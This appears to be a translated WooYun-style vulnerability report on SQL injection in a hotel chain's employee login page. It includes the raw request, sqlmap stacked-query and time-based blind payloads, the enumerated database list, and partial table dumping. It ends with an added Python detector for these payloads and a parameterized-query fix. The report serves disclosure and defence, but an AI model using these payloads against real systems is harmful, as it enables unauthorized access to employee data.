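2015-07-23: Details reported to the vendor; awaiting vendor handling
2015-07-27: Vendor confirmed; details disclosed to the vendor only
2015-08-06: Details disclosed to core white hats and experts in relevant fields
2015-08-16: Details disclosed to regular white hats
2015-08-26: Details disclosed to intern white hats
2015-09-10: Details disclosed to the public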
http://cas.wyn88.com/ is where employees log in. There is a problem in the following request:

POST /defaultapp.aspx HTTP/1.1
Content-Length: 292
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://cas.wyn88.com/
Cookie: ASP.NET_SessionId=mlptkym5n3zzp5t0fxxwwppa
Host: cas.wyn88.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun&__EVENTVALIDATION=/wEWBAKai5HiDwKb65yqBwKq3fPDCgLOlbHFCxxGpCzmkeM9SRn%2bu%2byIvmHwgfstJbPglqQOZ15M01n3&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0ZGR2D6nLeBBT/l/DUWGzDZh0bUHhjjp84xorSFsWyvnlSw%3d%3d
---
Parameter: Inuser (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun';WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALMgqgBApvrnKoHAqrd88MKAs6VscULAbrONCvc/kPNUObZJ/Z+0VXvUObBCl/HPxJm5a2lWz4=&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0D2QWAgIBD2QWAgIHDxYCHglpbm5lcmh0bWwFIeW3peWPt+S4jeWtmOWcqOaIluWvhueggeS4jeato+ehrmRkaOXVh1+cZcejnG5sy4yZjM48zXrrR2RSoTigQ7HiSoA=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun' AND 9281=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'iJFk'='iJFk&__EVENTVALIDATION=/wEWBALMgqgBApvrnKoHAqrd88MKAs6VscULAbrONCvc/kPNUObZJ/Z+0VXvUObBCl/HPxJm5a2lWz4=&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0D2QWAgIBD2QWAgIHDxYCHglpbm5lcmh0bWwFIeW3peWPt+S4jeWtmOWcqOaIluWvhueggeS4jeato+ehrmRkaOXVh1+cZcejnG5sy4yZjM48zXrrR2RSoTigQ7HiSoA=
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, Nginx, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [26]:
[*] CenterCRM
[*] ekp
[*] HRMS
[*] LMS
[*] master
[*] model
[*] msdb
[*] PmsBase
[*] PmsBusiness
[*] PmsBusiness_B
[*] PmsBusiness_B_History
[*] PmsBusiness_History
[*] PmsLog
[*] PmsLog_History
[*] PreOpenBase
[*] PreOpenBase_test
[*] ReportServer
[*] ReportServerTempDB
[*] sso
[*] tempdb
[*] velcro7
[*] webPur
[*] WXMTR
[*] wyn88db
[*] Wyncmsdb
[*] wyntempdb

[13:48:51] [INFO] fetching tables for database: velcro7
[13:48:51] [INFO] fetching number of tables for database 'velcro7'
[13:48:51] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[13:49:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[13:49:21] [INFO] adjusting time delay to 2 seconds due to good response times
816 -----------------------> More than eight hundred tables, so I did not keep running it; the employee information is in here. With the employee information you can log in; I don't know what else is inside.
[13:49:33] [INFO] retrieved: dbo.addrgrouplink
[13:52:45] [INFO] retrieved: dbo.addrlist
[13:53:59] [INFO] retrieved: dbo.adv
......
fix
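The two techniques reported against the Inuser field (stacked-query WAITFOR DELAY and the heavy-query self-join) can be flagged in logged POST bodies. This is an added example, not part of the original report or the vendor's code: the function name, rule names and sample bodies are constructed here, modelled on the payloads above with the ViewState fields left out.

```python
import re
from urllib.parse import unquote_plus

# Heuristic rules for the MSSQL payload shapes shown in the report (assumed rule names).
RULES = {
    "stacked-query time delay": re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    # COUNT(*) over the same system table joined to itself three or more times.
    "heavy-query time delay": re.compile(
        r"COUNT\s*\(\s*\*\s*\)\s+FROM\s+(sys\w+)\s+AS\s+\w+"
        r"(\s*,\s*\1\s+AS\s+\w+){2,}", re.I),
    # A single quote directly followed by SQL control syntax.
    "quote breakout": re.compile(r"'\s*(;|--|AND\b|OR\b)", re.I),
}

def inspect_login_body(body, fields=("Inuser", "Inpass")):
    """Return {field: [rule names]} for suspicious values in a form-encoded body."""
    findings = {}
    # Split on '&' only, so a ';' inside a value is never treated as a separator.
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        if name not in fields:
            continue
        value = unquote_plus(raw)
        hits = [rule for rule, rx in RULES.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings

# Constructed sample bodies: one benign login and the two payload shapes.
SAMPLES = [
    "Submit4=x&Inpass=123456&Inuser=wooyun",
    "Submit4=x&Inpass=123456&Inuser=wooyun%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--",
    "Submit4=x&Inpass=123456&Inuser=wooyun%27+AND+9281%3D%28SELECT+COUNT%28*%29"
    "+FROM+sysusers+AS+sys1%2Csysusers+AS+sys2%2Csysusers+AS+sys3%29"
    "+AND+%27iJFk%27%3D%27iJFk",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_login_body(body) or "clean")
```

Pattern matching like this only surfaces probing in logs; the fix itself is to bind Inuser and Inpass as query parameters instead of concatenating them into the SQL string.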
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-07-27 08:38
Thanks for your attention; a fix is in progress.
None yet